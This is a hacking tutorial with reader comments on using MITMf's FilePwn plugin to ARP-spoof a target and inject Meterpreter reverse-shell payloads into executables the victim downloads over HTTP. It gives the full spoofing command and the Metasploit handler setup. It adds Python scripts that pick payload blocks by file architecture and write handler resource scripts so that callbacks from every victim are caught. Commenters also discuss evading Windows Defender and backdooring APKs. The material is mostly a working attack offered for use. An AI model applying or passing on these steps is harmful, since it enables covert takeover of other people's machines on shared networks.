How To: Backdooring on the Fly with MITMf

Do you remember my last article on how to hook any web browser with MITMf and BeEF? Well, we are using the tool once again, but this time for auto-backdooring.

How It Works

MITMf (if you don't already know) is a man-in-the-middle attack framework; the name literally stands for "Man In The Middle framework." It bundles many different plugins to help you with MitM attacks. In this case we are using its FilePwn plugin, which automatically backdoors every executable that one specific machine downloads over HTTP while the download passes through us. Cool, eh?

We will be ARP spoofing a Windows 8.1 VM in this test.

Note: FilePwn can only patch a download it sees in cleartext, so this only works for plain HTTP downloads. For HTTPS sites you would have to combine it with MITMf's SSLstrip+ support, and even that only helps where the download can actually be downgraded to HTTP.

Requirements


You will only need MITMf and Metasploit for this attack. You can install MITMf either from Kali's apt repository (apt-get install mitmf) or from the GitHub repository (git clone https://github.com/byt3bl33d3r/MITMf).

If you install via apt, remember to run apt-get update first.

Metasploit is built into Kali.

Step 1: Editing the Configurations

Now that we have MITMf installed, we need to edit the config file to match our setup. With the apt package it lives at /usr/share/mitmf/config/mitmf.cfg (with a git clone it is config/mitmf.cfg inside the cloned directory).

Scroll down until you get to the FilePwn section.

Under the CompressedFiles section you can see a configuration block for each target type and payload (WindowsIntelx86, WindowsIntelx64 and so on). Set the HOST variable in the block you want to your own IP, the one the victim can reach, but don't change the port. Just remember the port number for the payload you want to use; the Metasploit listener has to use exactly that port.

Step 2: Selecting the Target

When we run MITMf with FilePwn, we want to listen for the payload specific to the target. In this case I'm targeting a Windows 8.1 machine, so I would use WindowsIntelx86; the port number for that block is 8443. Remember your payload's port number for later.

One caveat: FilePwn picks the block by the architecture of the file being downloaded, not by the target's OS. A 32-bit installer fetched by a 64-bit Windows box still gets the WindowsIntelx86 payload (which runs fine under WOW64), while a native 64-bit executable gets the WindowsIntelx64 one. If you don't know which the victim will download, run a handler on both ports.
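Because the payload block follows the file rather than the victim's OS, it helps to know which block a given download would hit before you decide which handler to start. The following is an added example of mine, not code from MITMf or Backdoor Factory: it reads the PE headers the standard way (DOS header, PE signature, COFF Machine field, optional-header magic) and maps the result onto the WindowsIntelx86/WindowsIntelx64 block names from mitmf.cfg. The fake_pe() helper builds constructed header-only samples for testing; they are not runnable programs.

```python
import struct

# PE/COFF header constants (from the PE format specification)
IMAGE_FILE_MACHINE_I386 = 0x014C
IMAGE_FILE_MACHINE_AMD64 = 0x8664
PE32_MAGIC = 0x10B       # optional header magic of a 32-bit image
PE32PLUS_MAGIC = 0x20B   # optional header magic of a 64-bit image

# mitmf.cfg target block that FilePwn applies to each architecture
TARGET_BLOCK = {"x86": "WindowsIntelx86", "x64": "WindowsIntelx64"}


def pe_arch(data):
    """Return 'x86', 'x64' or None for the leading bytes of a file.

    Only the DOS header, PE signature, COFF header and the optional header
    magic are inspected, so the first few KB of a download are enough.
    """
    if len(data) < 0x40 or data[:2] != b"MZ":
        return None
    e_lfanew = struct.unpack_from("<I", data, 0x3C)[0]
    # need: 4-byte "PE\0\0" + 20-byte COFF header + 2-byte optional header magic
    if e_lfanew + 26 > len(data) or data[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        return None
    machine = struct.unpack_from("<H", data, e_lfanew + 4)[0]
    magic = struct.unpack_from("<H", data, e_lfanew + 24)[0]
    if machine == IMAGE_FILE_MACHINE_I386 and magic == PE32_MAGIC:
        return "x86"
    if machine == IMAGE_FILE_MACHINE_AMD64 and magic == PE32PLUS_MAGIC:
        return "x64"
    return None  # ARM, inconsistent headers, or not a PE at all


def filepwn_block(data):
    """Name of the mitmf.cfg block whose HOST/PORT a patched copy would call back to."""
    return TARGET_BLOCK.get(pe_arch(data))


def fake_pe(machine, magic):
    """Constructed minimal header (not a runnable program) to exercise pe_arch()."""
    dos_header = b"MZ" + b"\0" * 58 + struct.pack("<I", 0x40)   # e_lfanew = 0x40
    coff_header = struct.pack("<HHIIIHH", machine, 1, 0, 0, 0, 0xE0, 0x0102)
    return dos_header + b"PE\0\0" + coff_header + struct.pack("<H", magic)


if __name__ == "__main__":
    import sys
    for path in sys.argv[1:]:
        with open(path, "rb") as f:
            head = f.read(4096)
        print("%s: %s -> %s" % (path, pe_arch(head), filepwn_block(head)))
```

Run it against the installers you expect the victim to fetch (python3 pe_arch.py putty.exe winrar.exe) and start a handler for every block it reports; a file that comes back as None is not something the Windows blocks will ever patch.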

Step 3: Set Up a Listener

We're going to use Metasploit as our payload listener. In msfconsole, load the generic handler:

use exploit/multi/handler

Then set your payload. In this case I'm using Meterpreter:

set PAYLOAD windows/meterpreter/reverse_tcp

Set the LHOST and LPORT options to the HOST and PORT of the config block you chose:

set LHOST 10.0.2.117
set LPORT 8443
(Make sure you set the corresponding port number! If LPORT differs from the PORT in the config, the patched file will call back to a port nobody is listening on.)

It also pays to keep the handler alive after the first session, otherwise every later victim is dropped:

set ExitOnSession false

Then exploit -j to run it as a background job. Open up a new terminal...

Step 4: Running the Attack

To run the attack, use the following command:
mitmf --spoof --arp -i <interface> --gateway <gateway IP> --target <target IP> --filepwn

For me it would be:
mitmf --spoof --arp -i wlan0 --gateway 10.0.2.1 --target 10.0.2.15 --filepwn

Pretty soon you should see MITMf logging the target's HTTP requests as they pass through you.

If the user downloads a file and the file is patchable, you should get output saying "File patched successfully. Sending to target." As soon as the victim opens the file, you should get a Meterpreter session on your handler.

If it doesn't say it was patched, it wasn't. Unfortunately, this tactic doesn't work 100% of the time: FilePwn skips hosts and URL keywords on its blacklist, files over its size limit and anything that isn't a plain PE (or a supported archive of one), and the binary still has to pass Backdoor Factory's own checks. One output worth recognising is a list headed "The following bdfactorys are available: (use -s)" where you expected the patched message; that is Backdoor Factory telling you the SHELL it was asked to use did not match any shell it knows, so compare the SHELL value in your target block against that list.
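The one mistake that silently breaks Steps 1, 3 and 4 is a handler whose LPORT does not match the PORT in the target block. Here is an added example of mine, not part of MITMf, that removes that step by hand: it parses the FilePwn target blocks out of mitmf.cfg (configobj syntax, where nesting depth is the number of brackets) and writes a Metasploit resource script whose LHOST/LPORT come straight from the config. It also flags two blocks that share the same HOST:PORT, which the config itself warns against. SAMPLE_CFG is a constructed excerpt: the block names, HOST/PORT keys and port 8443 follow the article, while the MSFPAYLOAD key and port 8444 for the x64 block are assumptions about the shipped config.

```python
import re

# Constructed excerpt in the shape of the FilePwn section of mitmf.cfg. The block
# names, HOST/PORT keys and port 8443 follow the article; MSFPAYLOAD (the key the
# shipped config uses for the Metasploit payload name) and port 8444 are assumed.
SAMPLE_CFG = """
[FilePwn]
    [[targets]]
        [[[ALL]]]
            WindowsType = ALL
            [[[[WindowsIntelx86]]]]
                HOST = 10.0.2.117
                PORT = 8443   # don't change the port, just remember it
                MSFPAYLOAD = windows/meterpreter/reverse_tcp
            [[[[WindowsIntelx64]]]]
                HOST = 10.0.2.117
                PORT = 8444
                MSFPAYLOAD = windows/x64/meterpreter/reverse_tcp
"""

# Used when a block has no MSFPAYLOAD line; the x86 entry is the article's payload.
DEFAULT_PAYLOAD = {
    "WindowsIntelx86": "windows/meterpreter/reverse_tcp",
    "WindowsIntelx64": "windows/x64/meterpreter/reverse_tcp",
}

SECTION_RE = re.compile(r"^\s*(\[+)\s*([^\[\]]+?)\s*\]+\s*$")
KEY_RE = re.compile(r"^\s*([A-Za-z_]\w*)\s*=\s*(.*?)\s*$")


def parse_targets(text):
    """Return {block_name: {key: value}} for every FilePwn block with HOST and PORT."""
    sections, path = {}, []
    for line in text.splitlines():
        m = SECTION_RE.match(line)
        if m:
            depth = len(m.group(1))               # [[[[X]]]] -> depth 4
            path = path[:depth - 1] + [m.group(2)]
            sections[tuple(path)] = {}
            continue
        m = KEY_RE.match(line)
        if m and path:
            value = m.group(2).split("#", 1)[0].strip()   # drop inline comment
            sections[tuple(path)][m.group(1)] = value
    return {p[-1]: kv for p, kv in sections.items()
            if p[0] == "FilePwn" and "HOST" in kv and "PORT" in kv}


def handler_rc(targets, block):
    """msfconsole resource script for one block, with LPORT taken from the config."""
    t = targets[block]                       # KeyError if the block doesn't exist
    payload = t.get("MSFPAYLOAD") or DEFAULT_PAYLOAD[block]
    return "\n".join([
        "use exploit/multi/handler",
        "set PAYLOAD " + payload,
        "set LHOST " + t["HOST"],
        "set LPORT " + t["PORT"],
        "set ExitOnSession false",           # keep listening after the first victim
        "exploit -j -z",
        "",
    ])


def all_handlers_rc(targets, blocks=("WindowsIntelx86", "WindowsIntelx64")):
    """One resource script covering every block present, so either arch calls home."""
    return "\n".join(handler_rc(targets, b) for b in blocks if b in targets)


def port_collisions(targets):
    """Blocks that share HOST:PORT; the config warns these must not overlap."""
    by_endpoint = {}
    for name, t in targets.items():
        by_endpoint.setdefault(t["HOST"] + ":" + t["PORT"], []).append(name)
    return sorted((ep, names) for ep, names in by_endpoint.items() if len(names) > 1)


if __name__ == "__main__":
    import sys
    cfg_path = sys.argv[1] if len(sys.argv) > 1 else "/usr/share/mitmf/config/mitmf.cfg"
    with open(cfg_path) as f:
        targets = parse_targets(f.read())
    for endpoint, names in port_collisions(targets):
        print("WARNING: %s is shared by %s" % (endpoint, ", ".join(names)))
    with open("handlers.rc", "w") as f:
        f.write(all_handlers_rc(targets))
    print("wrote handlers.rc; start with: msfconsole -r handlers.rc")
```

Run it after editing the config and start Metasploit with msfconsole -r handlers.rc; both handlers come up as background jobs and the ports cannot drift from what FilePwn writes into the patched binaries.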

Conclusion

Now we know how to run a very neat trick: backdooring on the fly. It gets even better if you do this from a mobile device, as you will be very discreet. Don't abuse this power. As the MITMf help menu says, quoting Yoda, "Use wisely, young padawan."

C|H of C3

NOTE: This has been sitting in my drafts for a month now. I've been waiting to post this for a long time.

41 Comments

I really am loving your MITM tutorials. Keep it up!

-Phoenix750

Thanks! Appreciation always makes my day. :)

Brings me back to my first comment ever on Null Byte: the feels!

I see you like MITMf quite a lot, ah?
Anyway, support for HSTS is as simple as adding a flag; did you omit that for a reason?
Anyway, good job.

I've had too many errors with bypassing HSTS, so I'm looking into that.

Another great article, thank you Cracker|Hacker.

By using it from a phone, do you mean getting Linuxdeploy/Nethunter?

This is going to be so awesome when I use this on my phone. Thanks man, +1, great post.

Just the other day I started playing around with MITM, glad you have a good series on it :D

Yeah, I'm just probably going to write an MitM series.

Now, there is an alternative to MITMf, and that's using an evil AP. Should I write something up on that as well (it might take a while)?

Of course you should! (If you haven't yet, because it's been a year since you posted it :) )

Cracker Hacker, you're a magician at MitM.

I have always found much interest in it. Thanks. :)

Cracker | Hacker,
You should definitely write a tutorial on Evil AP.
No worries, we can wait :)

Alright, I'll get on it as soon as I get some sleep. *yawn...*

ZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZ

When I download, for example, PuTTY like you did, I get this output in mitmf:

2015-07-02 22:51:08 192.168.178.27 Detected supported binary type!

* In the backdoor module
* Checking if binary is supported
* Gathering file info
* Reading win32 entry instructions
The following bdfactorys are available: (use -s)
cave_miner_inline
iat_reverse_tcp_inline
iat_reverse_tcp_inline_threaded
iat_reverse_tcp_stager_threaded
iat_user_supplied_shellcode_threaded
meterpreter_reverse_https_threaded
reverse_shell_tcp_inline
reverse_tcp_stager_threaded
user_supplied_shellcode_threaded

And the target PC just downloads the file and 'gets away'.

What am I missing here?

And by the way, does this only work on .exe files?

ApeRock

I don't know about the 1st question...

MITMf backdoors .exe and .zip files.

Same thing I get, and I can't find any information anywhere about how to solve this issue. Any help is greatly appreciated.

What do I have to do after this shows up?

* In the backdoor module
* Checking if binary is supported
* Gathering file info
* Reading win32 entry instructions

The following bdfactorys are available: (use -s)
cave_miner_inline
iat_reverse_tcp_inline
iat_reverse_tcp_inline_threaded
iat_reverse_tcp_stager_threaded
iat_user_supplied_shellcode_threaded
meterpreter_reverse_https_threaded
reverse_shell_tcp_inline
reverse_tcp_stager_threaded
user_supplied_shellcode_threaded

Perhaps the executable was not backdoorable, but I'm not fully sure.

I got the same! Pretty weird...

Great tutorial, however there is one thing. Windows Defender is pretty proficient at picking up Metasploit backdoored executables. It even auto-deletes them sometimes. I would recommend Hyperion or some other third-party encoders; I'm assuming you'd need to generate the custom shellcode and supply it to MITMf instead of using the default MSF payload? Many thanks for introducing me to this :)

How do I change the payload to a Python AES encrypted payload?

I didn't get what it exactly does... Does it inject a payload into a file that the victim wanted to download?
Or does it just send a file to the victim's PC?

When a victim downloads a backdoorable file, MITMf intercepts it, injects a payload into it, and then sends it on to the user. Basically both your options combined.

-Phoenix750

In addition to what Phoenix750 said, because you are ARP spoofing, you are intercepting their packets as they go through you.


So, say I downloaded a program like winrar.exe.
What it'll do is inject a payload into winrar.exe?
And winrar.exe will work normally as it's supposed to, and in the background our payload will work too?

Wow, thanks, that's really awesome!!

So this is showing the data going through, but hasn't shown the files created successfully. Does it just take a long time, or do I need to be browsing more?

Is encryption on the fly possible?
It's a cool thing, but I suppose that without encryption it's pretty worthless in practice, or am I wrong?

At step 2, for a 64-bit Windows 7 machine, would I use the same as in the tutorial or WindowsIntelx64?

You should use WindowsIntelx64 since you are using a 64-bit system. I'm not completely sure, but I think you can use the x86 (32-bit) one on a 64-bit system, since Windows should have compatibility for it.

Hello. This was a very nice tutorial for beginners, though the last phrase was a bit vague: "If it doesn't say it's patched, it can't be. Unfortunately, this tactic doesn't work 100% of the time." Is there any manual page or something that specifies when it does work and when not?

Hi, great Cracker|Hacker :)
How can I backdoor an .apk file on the fly?

Once I started infecting APKs, after injecting my malicious code into the APK file I had problems with signing them; I solved this with a sign.jar file. I think this problem would happen for backdooring APKs on the fly. Am I right?
